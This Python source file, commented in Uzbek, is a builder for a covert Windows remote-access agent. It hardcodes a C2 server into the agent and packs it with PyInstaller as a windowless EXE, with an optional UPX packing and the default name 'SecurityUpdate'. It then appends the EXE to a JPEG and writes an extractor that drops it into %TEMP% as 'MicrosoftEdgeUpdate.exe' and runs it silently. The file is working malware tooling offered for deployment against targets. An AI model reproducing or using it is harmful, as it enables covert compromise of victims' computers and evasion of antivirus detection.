"""
Stealthy Windows Agent Builder
- PyInstaller bilan EXE yasash (Python o'rnatmasdan ishlaydi)
- No console window (qora oyna yo'q)
- Image steganography (rasm ichiga yashirish)
- Built-in default image (tashqi rasm kerak emas!)
- AV evasion techniques
"""

import os
import sys
import subprocess
import shutil
from pathlib import Path

class StealthyAgentBuilder:
    """Windows agent ni steganography bilan build qilish"""
    
    def __init__(self):
        self.agent_path = Path(__file__).parent / "windows_agent.py"
        self.output_dir = Path(__file__).parent / "dist"
        self.build_dir = Path(__file__).parent / "build"
        
    def check_requirements(self):
        """Kerakli toollar bormi tekshirish"""
        print("🔍 Requirements tekshirilmoqda...\n")
        
        requirements = {
            'pyinstaller': 'pip install pyinstaller',
            'pillow': 'pip install pillow',
            'pycryptodome': 'pip install pycryptodome'
        }
        
        missing = []
        for package, install_cmd in requirements.items():
            try:
                __import__(package.replace('pycryptodome', 'Crypto'))
                print(f"✅ {package}")
            except ImportError:
                print(f"❌ {package} - Install: {install_cmd}")
                missing.append(install_cmd)
        
        if missing:
            print(f"\n⚠️ O'rnatish kerak:")
            for cmd in missing:
                print(f"   {cmd}")
            return False
        
        print("\n✅ Barcha requirements tayyor!\n")
        return True
    
    def create_spec_file(self, server_url, **options):
        """PyInstaller spec file yaratish - Advanced configuration"""
        
        spec_content = f'''# -*- mode: python ; coding: utf-8 -*-

block_cipher = None

# Hidden imports - zarur modullar
hiddenimports = [
    'common.crypto',
    'common.commands', 
    'common.ip_updater',
    'platform',
    'socket',
    'subprocess',
    'base64',
    'threading',
    'urllib.request',
    'winreg',
]

a = Analysis(
    ['windows_agent_embedded.py'],
    pathex=[],
    binaries=[],
    datas=[
        ('../common/*.py', 'common'),  # Common modullarni qo'shish
    ],
    hiddenimports=hiddenimports,
    hookspath=[],
    hooksconfig={{}},
    runtime_hooks=[],
    excludes=[
        'tkinter',      # GUI kerak emas
        'matplotlib',   # Plotting kerak emas
        'numpy',        # Agar ishlatilmasa
        'pandas',       # Agar ishlatilmasa
        'scipy',
    ],
    win_no_prefer_redirects=False,
    win_private_assemblies=False,
    cipher=block_cipher,
    noarchive=False,
)

pyz = PYZ(a.pure, a.zipped_data, cipher=block_cipher)

exe = EXE(
    pyz,
    a.scripts,
    a.binaries,
    a.zipfiles,
    a.datas,
    [],
    name='{"SecurityUpdate" if options.get("legit_name") else "agent"}',
    debug=False,
    bootloader_ignore_signals=False,
    strip=False,
    upx={"True" if options.get("upx_compress") else "False"},  # UPX compression
    upx_exclude=[],
    runtime_tmpdir=None,
    console=False,  # ❌ QORA OYNA YO'Q
    disable_windowed_traceback=False,
    argv_emulation=False,
    target_arch=None,
    codesign_identity=None,
    entitlements_file=None,
    icon={'options.get("icon_path", "NONE")'},  # Custom icon
    uac_admin=False,  # Admin request yo'q (stealth)
    version_file={'options.get("version_file", "NONE")'},  # Version info
)
'''
        
        spec_file = self.output_dir.parent / "agent_stealth.spec"
        with open(spec_file, 'w', encoding='utf-8') as f:
            f.write(spec_content)
        
        print(f"✅ Spec file yaratildi: {spec_file}\n")
        return spec_file
    
    def create_embedded_agent(self, server_url, port=8000, protocol='http'):
        """Embedded agent yaratish - hardcoded server"""
        
        # windows_agent.py ni o'qish
        with open(self.agent_path, 'r', encoding='utf-8') as f:
            agent_code = f.read()
        
        # Embedded versiya yaratish
        embedded_code = f'''"""
Embedded Windows Agent - No console, hardcoded server
Auto-generated by StealthyAgentBuilder
"""

# Server configuration - HARDCODED
SERVER_URL = "{server_url}"
SERVER_PORT = {port}
PROTOCOL = "{protocol}"
USE_ENCRYPTION = True
HEARTBEAT_INTERVAL = 5

{agent_code}

# Auto-start without arguments
if __name__ == '__main__':
    import sys
    
    # No console mode - redirect output
    if not hasattr(sys, 'ps1'):  # Not interactive
        sys.stdout = open(os.devnull, 'w')
        sys.stderr = open(os.devnull, 'w')
    
    # Create agent with hardcoded settings
    agent = WindowsAgent(
        server_host=SERVER_URL,
        server_port=SERVER_PORT,
        protocol=PROTOCOL,
        use_encryption=USE_ENCRYPTION
    )
    
    agent.heartbeat_interval = HEARTBEAT_INTERVAL
    
    # Run silently
    try:
        agent.run()
    except:
        pass  # Silent fail
'''
        
        embedded_path = self.agent_path.parent / "windows_agent_embedded.py"
        with open(embedded_path, 'w', encoding='utf-8') as f:
            f.write(embedded_code)
        
        print(f"✅ Embedded agent yaratildi: {embedded_path}\n")
        return embedded_path
    
    def build_exe(self, spec_file):
        """PyInstaller bilan EXE build qilish"""
        print("🔨 EXE build qilinmoqda (bu 1-2 daqiqa olishi mumkin)...\n")
        
        cmd = [
            'pyinstaller',
            '--clean',  # Clean build
            '--noconfirm',  # Overwrite
            str(spec_file)
        ]
        
        try:
            result = subprocess.run(cmd, check=True, capture_output=True, text=True)
            print("✅ EXE build muvaffaqiyatli!\n")
            return True
        except subprocess.CalledProcessError as e:
            print(f"❌ Build xatolik: {e}")
            print(f"Output: {e.stdout}")
            print(f"Error: {e.stderr}")
            return False
    
    def create_placeholder_image(self, width=800, height=600):
        """Placeholder rasm yaratish (agar tashqi rasm bo'lmasa)"""
        from PIL import Image, ImageDraw, ImageFont
        
        # Oq fon
        img = Image.new('RGB', (width, height), color='white')
        draw = ImageDraw.Draw(img)
        
        # Markazga text
        text = "Secure Document\nPlease wait..."
        bbox = draw.textbbox((0, 0), text)
        text_width = bbox[2] - bbox[0]
        text_height = bbox[3] - bbox[1]
        position = ((width - text_width) // 2, (height - text_height) // 2)
        
        draw.text(position, text, fill='gray')
        
        return img
    
    def embed_in_image(self, exe_path, image_path=None, output_path=None):
        """
        EXE ni rasm ichiga yashirish - Steganography
        Agar image_path berilsa - uni ishlatadi
        Aks holda - built-in placeholder image
        """
        from PIL import Image
        import io
        
        print(f"🖼️ Steganography qilinmoqda...\n")
        
        try:
            # EXE faylni o'qish
            with open(exe_path, 'rb') as f:
                exe_data = f.read()
            
            # Rasmni o'qish yoki yaratish
            if image_path and Path(image_path).exists():
                # CUSTOM IMAGE ishlatish
                img = Image.open(image_path)
                source = f"Custom image: {Path(image_path).name}"
                if not output_path:
                    output_path = Path(image_path).parent / f"safe_{Path(image_path).name}"
            else:
                # DEFAULT PLACEHOLDER yaratish
                if image_path:
                    print(f"⚠️ Image topilmadi: {image_path}")
                    print(f"📸 Built-in placeholder ishlatilmoqda...\n")
                img = self.create_placeholder_image()
                source = "Built-in placeholder (800x600)"
                if not output_path:
                    output_path = self.output_dir / "SecureDocument.jpg"
            
            # Rasmni bytes ga
            img_buffer = io.BytesIO()
            img.save(img_buffer, format='JPEG', quality=85)
            img_bytes = img_buffer.getvalue()
            
            # Separator (magic bytes)
            separator = b'\xFF\xD9\xFF\xD8PAYLOAD_START'
            
            # Combine: IMAGE + SEPARATOR + EXE
            combined = img_bytes + separator + exe_data
            
            # Yangi faylga yozish
            with open(output_path, 'wb') as f:
                f.write(combined)
            
            print(f"✅ Steganography muvaffaqiyatli!")
            print(f"   Source: {source}")
            print(f"   Output: {output_path}")
            print(f"   Image: {len(img_bytes):,} bytes")
            print(f"   EXE: {len(exe_data):,} bytes")
            print(f"   Total: {len(combined):,} bytes\n")
            
            return output_path
            
        except Exception as e:
            print(f"❌ Steganography xatolik: {e}")
            import traceback
            traceback.print_exc()
            return None
    
    def create_extractor(self):
        """Payload extractor yaratish"""
        
        extractor_code = '''"""
Payload Extractor - Rasm ichidan EXE ni chiqarish va ishga tushirish
Usage: python extract_payload.py image_with_payload.jpg
"""

import sys
import os
import subprocess

def extract_and_run(image_file):
    """Extract EXE from image and run silently"""
    
    print(f"🔓 Extracting payload from {image_file}...")
    
    try:
        # Read image file
        with open(image_file, 'rb') as f:
            data = f.read()
        
        # Find separator
        separator = b\'\\xFF\\xD9\\xFF\\xD8PAYLOAD_START\'
        
        if separator not in data:
            print("❌ No payload found!")
            return False
        
        # Split at separator
        parts = data.split(separator)
        exe_data = parts[1] if len(parts) > 1 else None
        
        if not exe_data:
            print("❌ Invalid payload!")
            return False
        
        # Temp directory
        temp_dir = os.getenv('TEMP')
        
        # Legit-looking filename
        temp_exe = os.path.join(temp_dir, 'MicrosoftEdgeUpdate.exe')
        
        # Write EXE
        with open(temp_exe, 'wb') as f:
            f.write(exe_data)
        
        print(f"✅ Extracted: {len(exe_data):,} bytes")
        print(f"🚀 Running...")
        
        # Run silently - NO WINDOW
        if os.name == 'nt':  # Windows
            subprocess.Popen(
                [temp_exe],
                creationflags=0x08000000,  # CREATE_NO_WINDOW
                stdout=subprocess.DEVNULL,
                stderr=subprocess.DEVNULL,
                stdin=subprocess.DEVNULL,
                close_fds=True
            )
        else:
            subprocess.Popen(
                [temp_exe],
                stdout=subprocess.DEVNULL,
                stderr=subprocess.DEVNULL,
                stdin=subprocess.DEVNULL
            )
        
        print("✅ Payload running in background!")
        return True
        
    except Exception as e:
        print(f"❌ Error: {e}")
        return False

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print("Usage: python extract_payload.py <image_file>")
        sys.exit(1)
    
    image_file = sys.argv[1]
    
    if not os.path.exists(image_file):
        print(f"❌ File not found: {image_file}")
        sys.exit(1)
    
    extract_and_run(image_file)
'''
        
        extractor_path = Path(__file__).parent / "extract_payload.py"
        with open(extractor_path, 'w', encoding='utf-8') as f:
            f.write(extractor_code)
        
        print(f"✅ Extractor yaratildi: {extractor_path}\n")
        return extractor_path
    
    def build_all(self, server_url, port=8000, protocol='http', image_path=None, **options):
        """To'liq build process"""
        
        print("=" * 60)
        print("🎯 STEALTHY WINDOWS AGENT BUILDER")
        print("=" * 60)
        print()
        
        # 1. Check requirements
        if not self.check_requirements():
            print("\n❌ Requirements o'rnatilmagan!")
            return False
        
        # 2. Create embedded agent
        embedded_agent = self.create_embedded_agent(server_url, port, protocol)
        
        # 3. Create spec file
        spec_file = self.create_spec_file(server_url, **options)
        
        # 4. Build EXE
        if not self.build_exe(spec_file):
            return False
        
        # 5. Find built EXE
        exe_name = options.get('legit_name') or 'agent'
        exe_path = self.output_dir / f"{exe_name}.exe"
        
        if not exe_path.exists():
            print(f"❌ EXE topilmadi: {exe_path}")
            return False
        
        print(f"✅ EXE tayyor: {exe_path}")
        print(f"   Size: {exe_path.stat().st_size:,} bytes\n")
        
        # 6. Steganography - DOIM ISHLATILADI
        # Agar image berilsa - uni ishlat, aks holda default
        output_image = self.embed_in_image(exe_path, image_path)
        
        # Create extractor
        if output_image:
            self.create_extractor()
        
        # 7. Summary
        print("=" * 60)
        print("✅ BUILD TUGADI!")
        print("=" * 60)
        print(f"\n📦 Files:")
        print(f"   - EXE: {exe_path}")
        if output_image:
            print(f"   - Steganography: {output_image}")
            print(f"   - Extractor: extract_payload.py")
        print(f"\n🎯 Features:")
        print(f"   ✅ No Console Window (qora oyna yo'q)")
        print(f"   ✅ Standalone (Python kerak emas)")
        print(f"   ✅ Steganography (rasm ichida yashirilgan)")
        if image_path:
            print(f"   ✅ Custom image ishlatildi")
        else:
            print(f"   ✅ Built-in placeholder ishlatildi")
        print(f"\n🚀 Deployment:")
        print(f"   1. {Path(output_image).name} + extract_payload.py")
        print(f"   2. Target: python extract_payload.py {Path(output_image).name}")
        print(f"   3. Yoki direct: {exe_path}\n")
        
        return True


def main():
    """Main funksiya"""
    import argparse
    
    parser = argparse.ArgumentParser(
        description='Stealthy Windows Agent Builder',
        epilog='Misol: python build_stealthy_agent.py http://server.com --image photo.jpg'
    )
    parser.add_argument('server', help='C2 Server URL (http://your-server.com)')
    parser.add_argument('--port', type=int, default=8000, help='Server port (default: 8000)')
    parser.add_argument('--protocol', choices=['http', 'https', 'tcp'], default='http', 
                        help='Protocol (default: http)')
    parser.add_argument('--image', help='Custom image (.jpg/.png). Agar berilmasa, default rasm ishlatiladi')
    parser.add_argument('--legit-name', default='SecurityUpdate', help='EXE name (default: SecurityUpdate)')
    parser.add_argument('--upx', action='store_true', help='Enable UPX compression')
    parser.add_argument('--icon', help='Custom .ico file')
    
    args = parser.parse_args()
    
    builder = StealthyAgentBuilder()
    
    options = {
        'legit_name': args.legit_name,
        'upx_compress': args.upx,
        'icon_path': args.icon,
    }
    
    builder.build_all(
        server_url=args.server,
        port=args.port,
        protocol=args.protocol,
        image_path=args.image,
        **options
    )


if __name__ == '__main__':
    main()
